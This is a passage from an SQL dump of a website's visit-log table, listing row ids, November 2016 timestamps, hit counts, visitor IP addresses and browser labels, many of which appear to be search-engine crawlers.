'163.172.65.215','other'),(73590,1478580881,1,1,0,0,'141.8.142.67','other'),(73591,1478581415,1,1,0,0,'66.102.9.29','other'),(73592,1478581743,1,1,0,0,'46.211.154.31','chrome'),(73593,1478581837,1,1,0,0,'66.249.69.52','chrome'),(73594,1478582369,1,1,0,0,'66.249.69.60','chrome'),(73595,1478583041,1,1,0,0,'157.55.39.51','other'),(73596,1478584424,1,1,0,0,'163.172.65.34','other'),(73597,1478584447,1,1,0,0,'163.172.65.116','other'),(73598,1478584761,1,1,0,0,'163.172.66.25','other'),(73599,1478584910,1,1,0,0,'163.172.65.2','other'),(73600,1478585022,1,1,0,0,'163.172.64.187','other'),(73601,1478585086,1,1,0,0,'157.55.39.92','other'),(73602,1478586316,1,1,0,0,'163.172.64.234','other'),(73603,1478586766,1,1,0,0,'94.179.38.253','firefox'),(73604,1478587242,1,1,0,0,'157.55.39.41','other'),(73605,1478587487,1,0,1,0,'66.249.69.56',''),(73606,1478587730,2,2,0,0,'91.196.178.67','chrome'),(73607,1478587765,1,1,0,0,'66.102.9.27','chrome'),(73608,1478588585,1,1,0,0,'163.172.66.112','other'),(73609,1478588876,1,1,0,0,'37.55.108.70','chrome'),(73610,1478588911,1,1,0,0,'163.172.65.36','other'),(73611,1478589119,1,1,0,0,'66.102.9.29','other'),(73612,1478589895,1,1,0,0,'91.196.178.68','firefox'),(73613,1478590245,1,1,0,0,'163.172.64.250','other'),(73614,1478590741,1,1,0,0,'163.172.64.217','other'),(73615,1478590971,1,1,0,0,'163.172.66.54','other'),(73616,1478591198,1,1,0,0,'66.249.69.60','chrome'),(73617,1478591366,1,1,0,0,'157.55.39.41','other'),(73618,1478591389,1,1,0,0,'163.172.66.172','other'),(73619,1478591882,1,1,0,0,'91.196.178.67','chrome'),(73620,1478592077,1,1,0,0,'163.172.66.56','other'),(73621,1478592309,1,1,0,0,'66.102.9.25','other'),(73622,1478592882,1,1,0,0,'91.196.178.70','firefox'),(73623,1478593911,1,1,0,0,'66.249.69.79','chrome'),(73624,1478593952,1,1,0,0,'163.172.64.242','other'),(73625,1478594110,1,1,0,0,'141.8.183.25','other'),(73626,1478594120,1,1,0,0,'130.193.51.19','other'),(73627,1478594335,1,1,0,0,'163.172.66.105','other'),(73628,1478594356,1,1,0,0,'163.172.66.28','other'),(73629,1478595684,1,1,0,0,'66.249.93.143','chrome'),(73630,1478595798,1,1,0,0,'163.172.66.117','other'),(73631,1478595823,1,1,0,0,'66.249.93.141','chrome'),(73632,1478596016,1,1,0,0,'46.211.153.199','chrome'),(73633,1478596234,1,1,0,0,'66.249.93.142','chrome'),(73634,1478596267,1,1,0,0,'66.102.9.25','other'),(73635,1478596837,1,1,0,0,'66.249.93.143','chrome'),(73636,1478596845,1,1,0,0,'66.249.93.141','chrome'),(73637,1478597059,1,1,0,0,'91.196.178.67','chrome'),(73638,1478599784,1,1,0,0,'180.76.15.153','other'),(73639,1478600608,1,1,0,0,'163.172.65.249','other'),(73640,1478600649,1,1,0,0,'95.134.169.143','chrome'),(73641,1478600960,1,1,0,0,'157.55.39.92','other'),(73642,1478601148,1,1,0,0,'77.37.141.103','firefox'),(73643,1478601162,1,1,0,0,'128.68.53.119','firefox'),(73644,1478601842,1,1,0,0,'66.249.69.60','chrome'),(73645,1478602187,1,1,0,0,'91.196.178.164','chrome'),(73646,1478602506,1,1,0,0,'163.172.65.210','other'),(73647,1478602668,1,1,0,0,'91.196.178.70','firefox'),(73648,1478602917,1,1,0,0,'91.196.178.70','chrome'),(73649,1478602947,1,1,0,0,'66.102.9.25','other'),(73650,1478603500,1,1,0,0,'95.135.45.91','chrome'),(73651,1478603502,1,1,0,0,'163.172.65.62','other'),(73652,1478604152,1,1,0,0,'163.172.66.106','other'),(73653,1478604354,1,1,0,0,'163.172.66.52','other'),(73654,1478604438,1,1,0,0,'163.172.66.16','other'),(73655,1478604464,1,1,0,0,'163.172.66.107','other'),(73656,1478604955,1,1,0,0,'91.196.178.65','firefox'),(73657,1478605266,1,1,0,0,'92.242.107.122','chrome'),(73658,1478605659,1,1,0,0,'163.172.66.38','other'),(73659,1478605754,1,1,0,0,'163.172.66.56','other'),(73660,1478605925,1,1,0,0,'163.172.66.51','other'),(73661,1478606299,1,1,0,0,'163.172.65.225','other'),(73662,1478606519,1,1,0,0,'66.102.9.25','other'),(73663,1478607355,1,1,0,0,'163.172.66.178','other'),(73664,1478607875,1,1,0,0,'163.172.65.232','other'),(73665,1478608042,1,1,0,0,'163.172.66.165','other'),(73666,1478608071,1,1,0,0,'163.172.66.39','other'),(73667,1478608196,1,1,0,0,'163.172.66.150','other'),(73668,1478608675,1,0,1,0,'66.249.69.60',''),(73669,1478609471,1,1,0,0,'163.172.66.77','other'),(73670,1478609803,1,1,0,0,'91.196.178.67','msie'),(73671,1478609847,1,1,0,0,'163.172.65.8','other'),(73672,1478609956,1,1,0,0,'163.172.64.251','other'),(73673,1478610523,1,1,0,0,'66.102.9.27','other'),(73674,1478611894,1,1,0,0,'91.196.178.169','chrome'),(73675,1478612041,1,1,0,0,'163.172.64.237','other'),(73676,1478612333,1,1,0,0,'94.179.17.162','chrome'),(73677,1478612458,1,1,0,0,'91.196.178.38','firefox'),(73678,1478612594,1,1,0,0,'163.172.65.242','other'),(73679,1478612724,1,1,0,0,'95.132.28.10','firefox'),(73680,1478613469,1,1,0,0,'163.172.65.215','other'),(73681,1478613774,1,1,0,0,'37.73.215.71','chrome'),(73682,1478613794,1,1,0,0,'141.8.183.25','other'),(73683,1478613909,1,1,0,0,'66.102.9.27','other'),(73684,1478614205,1,1,0,0,'163.172.66.20','other'),(73685,1478614218,1,1,0,0,'66.249.69.56','chrome'),(73686,1478614344,1,1,0,0,'66.249.93.141','chrome'),(73687,1478614674,1,1,0,0,'31.43.4.151','chrome'),(73688,1478614789,1,1,0,0,'95.132.51.242','firefox'),(73689,1478614936,1,1,0,0,'163.172.66.100','other'),(73690,1478615100,1,0,1,0,'68.180.229.190',''),(73691,1478615652,1,1,0,0,'178.95.205.140','opera'),(73692,1478615806,1,1,0,0,'91.196.178.65','firefox'),(73693,1478616302,1,1,0,0,'31.43.29.129','chrome'),(73694,1478617119,1,1,0,0,'163.172.66.151','other'),(73695,1478617889,1,1,0,0,'157.55.39.41','other'),(73696,1478617920,1,1,0,0,'66.102.9.27','other'),(73697,1478618193,1,1,0,0,'163.172.66.8','other'),(73698,1478618865,1,1,0,0,'163.172.65.49','other'),(73699,1478619001,1,1,0,0,'192.162.237.47','firefox'),(73700,1478619168,1,1,0,0,'157.55.39.41','other'),(73701,1478620166,1,1,0,0,'163.172.65.187','other'),(73702,1478620223,1,1,0,0,'163.172.66.63','other'),(73703,1478620526,1,1,0,0,'94.179.209.79','firefox'),(73704,1478620628,3,3,0,0,'130.193.50.34','other'),(73705,1478621014,3,3,0,0,'141.8.183.25','other'),(73706,1478621966,1,1,0,0,'163.172.66.122','other'),(73707,1478622119,1,1,0,0,'94.179.209.79','firefox'),(73708,1478622218,1,1,0,0,'163.172.66.118','other'),(73709,1478622659,1,1,0,0,'163.172.66.171','other'),(73710,1478623374,1,1,0,0,'163.172.64.224','other'),(73711,1478624494,1,1,0,0,'163.172.66.157','other'),(73712,1478624884,1,1,0,0,'66.102.9.29','other'),(73713,1478625199,2,1,1,0,'62.210.83.88',''),(73714,1478626044,1,1,0,0,'163.172.66.57','other'),(73715,1478626101,1,1,0,0,'66.249.69.56','chrome'),(73716,1478626479,1,1,0,0,'91.196.178.69','opera'),(73717,1478626637,1,1,0,0,'180.76.15.19','other'),(73718,1478626915,1,1,0,0,'157.55.39.92','other'),(73719,1478627278,2,2,0,0,'94.179.246.168','chrome'),(73720,1478628302,1,0,1,0,'66.249.69.60',''),(73721,1478628345,1,1,0,0,'163.172.65.208','other'),(73722,1478628849,1,1,0,0,'163.172.66.146','other'),(73723,1478629326,1,1,0,0,'163.172.66.110','other'),(73724,1478629778,1,1,0,0,'40.77.167.39','other'),(73725,1478630203,1,1,0,0,'66.249.69.52','chrome'),(73726,1478630634,1,1,0,0,'207.46.13.154','other'),(73727,1478630881,1,1,0,0,'163.172.65.193','other'),(73728,1478633114,1,1,0,0,'134.249.168.207','chrome'),(73729,1478633601,1,1,0,0,'163.172.64.187','other'),(73730,1478634258,1,1,0,0,'157.55.39.41','other'),(73731,1478635510,1,1,0,0,'66.102.9.25','other'),(73732,1478636957,1,1,0,0,'188.163.79.54','chrome'),(73733,1478637450,1,1,0,0,'40.77.167.39','other'),(73734,1478638757,1,1,0,0,'163.172.65.45','other'),(73735,1478638902,1,1,0,0,'66.102.9.25','other'),(73736,1478640299,1,1,0,0,'163.172.64.183','other'),(73737,1478640362,1,1,0,0,'37.112.33.213','firefox'),(73738,1478641362,1,1,0,0,'163.172.64.245','other'),(73739,1478642579,1,1,0,0,'66.102.9.29','other'),(73740,1478644838,1,1,0,0,'157.55.39.41','other'),(73741,1478645038,1,1,0,0,'163.172.66.129','other'),(73742,1478645722,1,1,0,0,'163.172.64.185','other'),(73743,1478646100,1,1,0,0,'66.102.9.29','other'),(73744,1478646215,1,1,0,0,'163.172.64.229','other'),(73745,1478647140,1,0,1,0,'66.249.75.179',''),(73746,1478647752,1,0,1,0,'66.249.75.187',''),(73747,1478648667,1,1,0,0,'180.76.15.137','other'),(73748,1478649325,1,1,0,0,'163.172.64.222','other'),(73749,1478649780,1,1,0,0,'66.102.9.29','other'),(73750,1478650231,1,1,0,0,'163.172.65.231','other'),(73751,1478652082,1,1,0,0,'66.102.9.29','chrome'),(73752,1478653335,1,0,1,0,'66.249.69.155',''),(73753,1478653461,1,0,1,0,'66.249.75.183',''),(73754,1478654227,1,0,1,0,'66.249.75.187',''),(73755,1478654283,1,1,0,0,'66.102.9.27','other'),(73756,1478654377,1,0,1,0,'66.249.75.183',''),(73757,1478654455,1,1,0,0,'163.172.66.49','other'),(73758,1478655262,1,0,1,0,'68.180.230.220',''),(73759,1478655552,1,1,0,0,'163.172.65.111','other'),(73760,1478656026,1,1,0,0,'163.172.66.117','other'),(73761,1478656623,1,0,1,0,'66.249.76.14',''),(73762,1478656955,1,1,0,0,'163.172.66.61','other'),(73763,1478657140,1,1,0,0,'107.21.1.8','other'),(73764,1478657185,1,1,0,0,'163.172.66.162','other'),(73765,1478658078,1,1,0,0,'66.249.76.14','chrome'),(73766,1478659002,1,0,1,0,'68.180.230.220',''),(73767,1478659440,1,1,0,0,'66.102.9.25','other'),(73768,1478660386,1,1,0,0,'141.8.183.25','other'),(73769,1478662395,1,1,0,0,'66.102.9.27','other'),(73770,1478663923,1,0,1,0,'66.249.76.108',''),(73771,1478664306,1,1,0,0,'66.249.76.15','chrome'),(73772,1478664591,1,1,0,0,'66.102.9.25','chrome'),(73773,1478664653,1,1,0,0,'66.102.9.27','other'),(73774,1478664737,1,0,1,0,'66.249.76.14',''),(73775,1478664912,1,0,1,0,'66.249.76.13',''),(73776,1478667688,1,1,0,0,'66.249.66.84','chrome'),(73777,1478667832,1,1,0,0,'46.42.174.249','chrome'),(73778,1478668308,1,1,0,0,'66.102.9.29','other'),(73779,1478671141,1,0,1,0,'66.249.76.13',''),(73780,1478671355,1,1,0,0,'134.249.168.207','chrome'),(73781,1478671489,1,1,0,0,'66.102.9.25','other'),(73782,1478671983,1,1,0,0,'94.179.102.149','chrome'),(73783,1478672001,1,1,0,0,'130.193.50.34','other'),(73784,1478672360,1,1,0,0,'91.196.178.70','firefox'),(73785,1478672782,1,1,0,0,'95.132.48.67','chrome'),(73786,1478673273,1,1,0,0,'157.55.39.92','other'),(73787,1478674443,1,1,0,0,'163.172.65.225','other'),(73788,1478674575,1,0,1,0,'68.180.230.220',''),(73789,1478675051,1,1,0,0,'40.77.167.39','other'),(73790,1478675355,1,1,0,0,'66.102.9.25','other'),(73791,1478676027,1,1,0,0,'37.53.96.233','chrome'),(73792,1478677854,1,1,0,0,'66.249.66.81','chrome'),(73793,1478677978,1,0,1,0,'66.249.76.15',''),(73794,1478678009,1,1,0,0,'66.249.76.15','chrome'),(73795,1478678328,1,1,0,0,'66.249.93.141','chrome'),(73796,1478680569,1,1,0,0,'66.249.76.108','chrome'),(73797,1478680850,1,0,1,0,'66.249.76.15',''),(73798,1478681488,1,1,0,0,'91.196.178.68','chrome'),(73799,1478681630,1,0,1,0,'66.249.76.108',''),(73800,1478682183,1,1,0,0,'91.196.178.65','chrome'),(73801,1478682206,1,1,0,0,'66.102.9.27','other'),(73802,1478682396,1,1,0,0,'157.55.39.92','other'),(73803,1478683485,1,1,0,0,'207.46.13.154','other'),(73804,1478683931,1,1,0,0,'91.196.178.67','chrome'),(73805,1478684198,1,1,0,0,'178.93.148.27','chrome'),(73806,1478684585,1,1,0,0,'91.196.178.70','firefox'),(73807,1478685602,1,0,1,0,'68.180.229.190',''),(73808,1478685948,1,1,0,0,'91.196.177.46','chrome'),(73809,1478685997,1,1,0,0,'130.180.218.188','chrome'),(73810,1478686013,1,1,0,0,'134.249.168.207','chrome'),(73811,1478686302,1,1,0,0,'66.102.9.25','other'),(73812,1478686777,1,1,0,0,'91.196.178.67','firefox'),(73813,1478687171,1,1,0,0,'37.52.21.17','chrome'),(73814,1478689177,1,1,0,0,'46.219.244.91','chrome'),(73815,1478689646,1,1,0,0,'66.102.9.25','other'),(73816,1478689815,1,0,1,0,'66.249.66.81',''),(73817,1478690495,1,0,1,0,'66.249.76.108',''),(73818,1478690847,2,0,2,0,'66.249.76.13',''),(73819,1478692621,1,1,0,0,'91.196.179.61','chrome'),(73820,1478692753,1,1,0,0,'178.219.88.23','chrome'),(73821,1478692973,1,1,0,0,'94.179.7.205','chrome'),(73822,1478693096,2,2,0,0,'46.200.45.17','firefox'),(73823,1478693346,1,1,0,0,'66.102.9.29','other'),(73824,1478694054,1,1,0,0,'134.249.168.207','chrome'),(73825,1478694172,2,0,2,0,'66.249.76.14',''),(73826,1478694210,1,1,0,0,'66.249.76.13','chrome'),(73827,1478694494,2,2,0,0,'91.196.177.46','chrome'),(73828,1478694552,1,1,0,0,'66.249.66.84','chrome'),(73829,1478694706,1,0,1,0,'66.249.76.108',''),(73830,1478694799,1,1,0,0,'91.196.178.40','chrome'),(73831,1478695313,1,0,1,0,'66.249.76.15',''),(73832,1478695356,1,1,0,0,'91.196.178.68','firefox'),(73833,1478695458,1,0,1,0,'66.249.76.14',''),(73834,1478695918,1,1,0,0,'37.73.200.142','chrome'),(73835,1478696633,1,1,0,0,'95.132.119.22','chrome'),(73836,1478696684,1,1,0,0,'40.77.167.39','other'),(73837,1478697033,1,1,0,0,'66.102.9.25','other'),(73838,1478697264,1,1,0,0,'91.196.178.66','firefox'),(73839,1478697811,1,0,1,0,'66.249.76.14',''),(73840,1478697840,1,0,1,0,'66.249.76.109',''),(73841,1478698453,1,1,0,0,'91.229.242.47','chrome'),(73842,1478699367,1,0,1,0,'66.249.76.108',''),(73843,1478699376,1,1,0,0,'37.52.23.54','chrome'),(73844,1478699394,1,1,0,0,'141.8.183.25','other'),(73845,1478699685,2,0,2,0,'66.249.76.13',''),(73846,1478699918,1,1,0,0,'94.179.91.214','firefox'),(73847,1478700009,1,1,0,0,'195.49.151.89','chrome'),(73848,1478700158,1,1,0,0,'178.93.148.27','chrome'),(73849,1478700220,1,1,0,0,'66.102.9.27','other'),(73850,1478700302,1,1,0,0,'93.75.37.142','firefox'),(73851,1478700864,1,0,1,0,'66.249.66.81',''),(73852,1478700903,2,1,1,0,'62.210.83.88',''),(73853,1478700967,1,1,0,0,'91.196.178.70','firefox'),(73854,1478701008,1,1,0,0,'46.219.242.30','firefox'),(73855,1478701139,1,1,0,0,'94.179.91.214','firefox'),(73856,1478701471,1,1,0,0,'178.94.172.124','chrome'),(73857,1478702157,1,0,1,0,'66.249.76.15',''),(73858,1478702350,1,1,0,0,'91.196.178.67','msie'),(73859,1478702648,1,1,0,0,'176.15.244.130','chrome'),(73860,1478702794,1,1,0,0,'37.55.59.1','chrome'),(73861,1478703216,1,1,0,0,'94.179.69.58','chrome'),(73862,1478703352,1,0,1,0,'66.249.76.15',''),(73863,1478703805,1,0,1,0,'66.249.76.13',''),(73864,1478703949,1,1,0,0,'66.102.9.27','other'),(73865,1478705210,1,1,0,0,'66.249.76.13','chrome'),(73866,1478705564,1,1,0,0,'66.249.66.87','chrome'),(73867,1478706152,1,0,1,0,'66.249.76.15',''),(73868,1478706389,1,0,1,0,'66.249.76.14',''),(73869,1478706491,2,2,0,0,'141.8.183.25','other'),(73870,1478707276,1,1,0,0,'157.55.39.55','other'),(73871,1478707296,3,0,3,0,'66.249.76.109',''),(73872,1478707305,1,0,1,0,'66.249.76.107',''),(73873,1478707498,1,1,0,0,'66.102.9.25','other'),(73874,1478707581,1,1,0,0,'93.158.152.51','other'),(73875,1478707609,1,0,1,0,'66.249.76.108',''),(73876,1478707914,3,0,3,0,'66.249.76.14',''),(73877,1478708172,1,1,0,0,'37.52.42.174','other'),(73878,1478708584,1,1,0,0,'46.211.204.167','chrome'),(73879,1478708704,1,1,0,0,'66.102.9.25','chrome'),(73880,1478708870,1,0,1,0,'66.249.76.107',''),(73881,1478708937,1,1,0,0,'157.55.39.55','other'),(73882,1478710631,1,0,1,0,'66.249.66.87',''),(73883,1478711088,1,1,0,0,'157.55.39.41','other'),(73884,1478711428,1,0,1,0,'66.249.76.91',''),(73885,1478711521,1,1,0,0,'66.102.9.29','other'),(73886,1478711838,1,1,0,0,'91.196.177.8','chrome'),(73887,1478713432,2,0,2,0,'66.249.76.91',''),(73888,1478713644,1,1,0,0,'178.94.172.137','chrome'),(73889,1478714200,1,1,0,0,'91.196.178.162','chrome'),(73890,1478714942,1,1,0,0,'207.46.13.154','other'),(73891,1478715428,1,1,0,0,'141.0.12.108','other'),(73892,1478715460,1,0,1,0,'66.249.66.81',''),(73893,1478716084,1,0,1,0,'66.249.76.14',''),(73894,1478716226,1,1,0,0,'63.243.252.86','other'),(73895,1478716414,2,2,0,0,'95.133.192.228','chrome'),(73896,1478717322,1,0,1,0,'66.249.76.15',''),(73897,1478717790,1,1,0,0,'91.196.178.164','chrome'),(73898,1478718525,1,0,1,0,'66.249.76.14',''),(73899,1478718740,1,0,1,0,'66.249.76.13',''),(73900,1478719634,1,1,0,0,'37.115.133.124','firefox'),(73901,1478719658,1,1,0,0,'141.8.183.25','other'),(73902,1478719780,1,1,0,0,'46.211.66.54','chrome'),(73903,1478719976,1,1,0,0,'40.77.167.13','other'),(73904,1478720765,1,0,1,0,'66.249.76.15',''),(73905,1478721373,1,1,0,0,'23.101.61.176','other'),(73906,1478721693,1,1,0,0,'46.211.249.196','other'),(73907,1478723133,1,1,0,0,'94.179.209.79','firefox'),(73908,1478723917,1,1,0,0,'66.102.9.29','other'),(73909,1478724458,46,46,0,0,'94.199.151.22','other'),(73910,1478724783,1,0,1,0,'66.249.76.13',''),(73911,1478724926,2,0,2,0,'66.249.76.14',''),(73912,1478725522,1,1,0,0,'66.249.76.107','chrome'),(73913,1478727314,1,1,0,0,'188.255.99.72','chrome'),(73914,1478727498,1,0,1,0,'68.180.230.220',''),(73915,1478727844,1,1,0,0,'176.118.54.155','chrome'),(73916,1478728672,1,1,0,0,'40.77.167.13','other'),(73917,1478728973,1,0,1,0,'66.249.76.13',''),(73918,1478729401,1,1,0,0,'130.180.220.52','chrome'),(73919,1478729541,1,1,0,0,'91.196.178.162','chrome'),(73920,1478730728,1,1,0,0,'207.46.13.154','other'),(73921,1478731933,1,0,1,0,'66.249.66.84',''),(73922,1478732653,1,0,1,0,'66.249.76.13',''),(73923,1478732730,1,1,0,0,'207.46.13.154','other'),(73924,1478733275,1,0,1,0,'66.249.76.14',''),(73925,1478736018,1,0,1,0,'68.180.230.220',''),(73926,1478736930,1,1,0,0,'66.249.76.13','chrome'),(73927,1478737449,1,1,0,0,'40.77.167.39','other'),(73928,1478737763,1,0,1,0,'68.180.230.220',''),(73929,1478738765,1,1,0,0,'66.249.76.13','chrome'),(73930,1478739714,1,1,0,0,'66.249.76.15','chrome'),(73932,1478741468,1,1,0,0,'207.46.13.110','other'),(73933,1478742267,1,1,0,0,'207.46.13.154','other'),(73934,1478743570,1,0,1,0,'66.249.76.15',''),(73935,1478744438,1,0,1,0,'66.249.76.14',''),(73936,1478744791,1,1,0,0,'180.76.15.30','other'),(73937,1478746698,1,0,1,0,'66.249.76.15',''),(73938,1478747211,33,33,0,0,'51.255.162.166','other'),(73939,1478747998,1,1,0,0,'40.77.167.39','other'),(73940,1478748820,1,0,1,0,'66.249.76.13',''),(73941,1478748917,1,1,0,0,'207.46.13.110','other'),(73942,1478749849,30,30,0,0,'69.30.221.242','other'),(73943,1478750630,27,27,0,0,'69.30.198.186','other'),(73944,1478751090,1,1,0,0,'66.102.9.25','other'),(73945,1478753120,1,1,0,0,'207.46.13.154','other'),(73946,1478753157,1,1,0,0,'66.102.9.29','other'),(73947,1478753572,2,0,2,0,'66.249.76.14',''),(73948,1478754655,1,1,0,0,'130.193.50.34','other'),(73949,1478755664,1,0,1,0,'66.249.76.15',''),(73950,1478756130,1,0,1,0,'66.249.76.108',''),(73951,1478756754,1,0,1,0,'66.249.76.13',''),(73952,1478757884,1,1,0,0,'188.32.184.35','msie'),(73953,1478757929,1,1,0,0,'134.249.168.207','chrome'),(73954,1478758129,1,1,0,0,'66.102.9.25','other'),(73955,1478758331,1,1,0,0,'46.201.112.123','chrome'),(73956,1478758866,1,0,1,0,'66.249.76.15',''),(73957,1478759033,1,1,0,0,'91.196.178.68','firefox'),(73958,1478759209,2,0,2,0,'66.249.76.14',''),(73959,1478759489,1,1,0,0,'37.54.89.18','chrome'),(73960,1478760427,1,1,0,0,'94.179.78.226','chrome'),(73961,1478760600,1,1,0,0,'188.255.16.240','msie'),(73962,1478760782,1,1,0,0,'66.249.93.142','chrome'),(73963,1478761277,1,1,0,0,'128.68.47.85','msie'),(73964,1478761572,1,1,0,0,'66.102.9.27','other'),(73965,1478761616,1,1,0,0,'95.46.162.242','firefox'),(73966,1478762006,1,1,0,0,'5.9.73.227','other'),(73967,1478762944,1,1,0,0,'95.46.162.242','firefox'),(73968,1478763809,1,0,1,0,'66.249.76.109',''),(73969,1478763973,1,1,0,0,'66.249.66.87','chrome'),(73970,1478764303,1,1,0,0,'89.66.236.180','chrome'),(73971,1478765051,1,1,0,0,'46.211.136.56','chrome'),(73972,1478765114,1,1,0,0,'163.172.64.178','other'),(73973,1478765120,1,1,0,0,'66.102.9.29','other'),(73974,1478765270,1,1,0,0,'46.211.136.142','chrome'),(73975,1478765328,1,1,0,0,'195.211.175.37','chrome'),(73976,1478765508,1,0,1,0,'66.249.76.108',''),(73977,1478766052,1,0,1,0,'66.249.76.15',''),(73978,1478766104,1,1,0,0,'141.8.142.58','other'),(73979,1478766149,1,1,0,0,'141.8.183.25','other'),(73980,1478766379,1,1,0,0,'91.196.177.46','chrome'),(73981,1478766731,1,1,0,0,'130.180.217.38','chrome'),(73982,1478766828,1,0,1,0,'66.249.66.84',''),(73983,1478767085,1,1,0,0,'180.76.15.135','other'),(73984,1478767211,1,1,0,0,'82.207.48.50','chrome'),(73985,1478767226,1,1,0,0,'141.8.183.25','other'),(73986,1478768142,1,0,1,0,'66.249.66.81',''),(73987,1478768311,1,1,0,0,'91.196.178.68','firefox'),(73988,1478768372,1,1,0,0,'163.172.66.62','other'),(73989,1478769599,1,1,0,0,'130.180.216.54','firefox'),(73990,1478769679,2,2,0,0,'37.55.59.1','chrome'),(73991,1478769691,1,1,0,0,'195.66.141.224','chrome'),(73992,1478770375,1,1,0,0,'130.193.50.34','other'),(73993,1478770573,1,0,1,0,'66.249.76.13',''),(73994,1478770688,1,0,1,0,'66.249.76.15',''),(73995,1478771589,1,1,0,0,'66.249.76.109','chrome'),(73996,1478772370,1,1,0,0,'66.102.9.29','other'),(73997,1478772550,1,0,1,0,'66.249.76.15',''),(73998,1478772602,1,1,0,0,'5.255.253.68','other'),(73999,1478773473,1,0,1,0,'66.249.76.13',''),(74000,1478773488,1,0,1,0,'66.249.66.84',''),(74001,1478773682,1,0,1,0,'66.249.76.14',''),(74002,1478774448,1,1,0,0,'91.196.178.69','firefox'),(74003,1478774592,1,1,0,0,'180.76.15.31','other'),(74004,1478774652,1,0,1,0,'66.249.76.15',''),(74005,1478775086,1,1,0,0,'91.196.177.46','firefox'),(74006,1478775735,1,1,0,0,'130.193.50.34','other'),(74007,1478775767,1,1,0,0,'195.114.120.135','chrome'),(74008,1478775949,1,1,0,0,'66.102.9.29','other'),(74009,1478776881,1,0,1,0,'66.249.76.14',''),(74010,1478777180,1,1,0,0,'178.95.182.202','chrome'),(74011,1478777188,1,1,0,0,'130.193.50.34','other'),(74012,1478777320,1,1,0,0,'94.179.29.254','firefox'),(74013,1478778717,9,9,0,0,'176.9.131.69','other'),(74014,1478779034,1,1,0,0,'91.196.178.166','chrome'),(74015,1478779495,1,0,1,0,'66.249.76.14',''),(74016,1478779607,1,1,0,0,'66.102.9.27','other'),(74017,1478779971,1,1,0,0,'91.196.178.68','chrome'),(74018,1478780293,1,1,0,0,'37.53.238.100','firefox'),(74019,1478780701,1,1,0,0,'37.52.152.90','firefox'),(74020,1478780742,1,1,0,0,'130.193.50.34','other'),(74021,1478781448,1,0,1,0,'66.249.66.180',''),(74022,1478781554,1,1,0,0,'91.196.178.71','chrome'),(74023,1478781647,2,0,2,0,'66.249.76.14',''),(74024,1478782168,1,1,0,0,'130.180.216.214','chrome'),(74025,1478783164,1,1,0,0,'66.102.9.29','other'),(74026,1478783203,1,0,1,0,'66.249.76.13',''),(74027,1478783746,1,1,0,0,'195.34.204.155','chrome'),(74028,1478783771,1,1,0,0,'46.219.6.40','firefox'),(74029,1478783791,1,1,0,0,'130.193.51.19','other'),(74030,1478784412,1,1,0,0,'40.77.167.39','other'),(74031,1478784499,1,1,0,0,'66.249.66.81','chrome'),(74032,1478784759,1,1,0,0,'91.196.178.70','firefox'),(74033,1478784871,1,1,0,0,'91.196.178.163','chrome'),(74034,1478784928,1,1,0,0,'66.249.76.14','chrome'),(74035,1478785409,1,1,0,0,'130.193.50.34','other'),(74036,1478785714,2,2,0,0,'91.196.177.46','firefox'),(74037,1478786139,1,0,1,0,'68.180.229.190',''),(74038,1478786427,1,1,0,0,'66.249.66.87','chrome'),(74039,1478786627,1,1,0,0,'163.172.65.121','other'),(74040,1478786774,1,1,0,0,'66.102.9.27','other'),(74041,1478787374,1,1,0,0,'130.193.50.34','other'),(74042,1478787410,1,0,1,0,'68.180.229.190',''),(74043,1478787522,1,0,1,0,'66.249.66.180',''),(74044,1478788182,1,0,1,0,'66.249.76.13',''),(74045,1478788926,1,1,0,0,'95.158.40.45','chrome'),(74046,1478789793,1,0,1,0,'66.249.76.13',''),(74047,1478789825,1,1,0,0,'163.172.66.127','other'),(74048,1478790573,1,1,0,0,'91.196.177.46','firefox'),(74049,1478790574,1,0,1,0,'66.249.76.15',''),(74050,1478791219,1,1,0,0,'207.46.13.110','other'),(74051,1478791446,1,1,0,0,'46.211.113.116','other'),(74052,1478791820,1,1,0,0,'194.79.11.98','chrome'),(74053,1478792630,1,1,0,0,'91.196.178.67','chrome'),(74054,1478793265,1,1,0,0,'174.129.237.157','other'),(74055,1478794122,1,1,0,0,'66.102.9.29','chrome'),(74056,1478794154,1,1,0,0,'91.196.178.134','chrome'),(74057,1478794314,1,0,1,0,'66.249.76.15',''),(74058,1478794452,1,0,1,0,'66.249.76.109',''),(74059,1478795237,2,0,2,0,'66.249.76.13',''),(74060,1478795743,1,1,0,0,'37.54.20.199','chrome'),(74061,1478796152,1,1,0,0,'66.102.9.25','other'),(74062,1478796718,2,2,0,0,'62.210.148.91','chrome'),(74063,1478799510,1,1,0,0,'178.94.172.134','chrome'),(74064,1478799527,1,0,1,0,'66.249.76.14',''),(74065,1478799982,1,1,0,0,'95.134.104.44','chrome'),(74066,1478800707,1,1,0,0,'163.172.66.146','other'),(74067,1478800735,1,1,0,0,'207.46.13.110','other'),(74068,1478800897,2,0,2,0,'66.249.76.13',''),(74069,1478801139,1,1,0,0,'66.102.9.25','other'),(74070,1478801482,1,1,0,0,'217.69.133.169','firefox'),(74071,1478801715,1,1,0,0,'91.196.178.72','firefox'),(74072,1478802150,1,1,0,0,'178.95.247.41','chrome'),(74073,1478802181,1,1,0,0,'141.8.183.25','other'),(74074,1478803179,1,0,1,0,'66.249.76.14',''),(74075,1478803707,1,0,1,0,'66.249.76.13',''),(74076,1478804035,1,1,0,0,'141.8.183.25','other'),(74077,1478804135,1,1,0,0,'130.193.50.34','other'),(74078,1478804307,1,0,1,0,'66.249.76.15',''),(74079,1478804631,1,0,1,0,'66.249.76.14',''),(74080,1478804817,1,1,0,0,'66.102.9.25','other'),(74081,1478805080,1,0,1,0,'66.249.76.108',''),(74082,1478805165,1,1,0,0,'94.179.86.226','firefox'),(74083,1478805379,1,1,0,0,'163.172.66.77','other'),(74084,1478805569,1,1,0,0,'91.196.178.38','chrome'),(74085,1478805926,2,0,2,0,'66.249.76.13',''),(74086,1478807914,1,1,0,0,'94.179.86.226','firefox'),(74087,1478808360,1,1,0,0,'66.102.9.25','other'),(74088,1478808881,1,1,0,0,'94.179.49.39','firefox'),(74089,1478809152,1,1,0,0,'178.255.215.94','other'),(74090,1478810238,1,1,0,0,'78.111.176.98','chrome'),(74091,1478810952,1,1,0,0,'217.69.133.218','other'),(74092,1478811544,1,1,0,0,'40.77.167.39','other'),(74093,1478811979,1,1,0,0,'163.172.64.187','other'),(74094,1478812055,1,1,0,0,'193.107.72.85','chrome'),(74095,1478812112,1,1,0,0,'66.102.9.25','other'),(74096,1478813147,1,1,0,0,'157.55.39.41','other'),(74097,1478813365,1,1,0,0,'66.249.76.109','chrome'),(74098,1478814451,1,1,0,0,'91.196.178.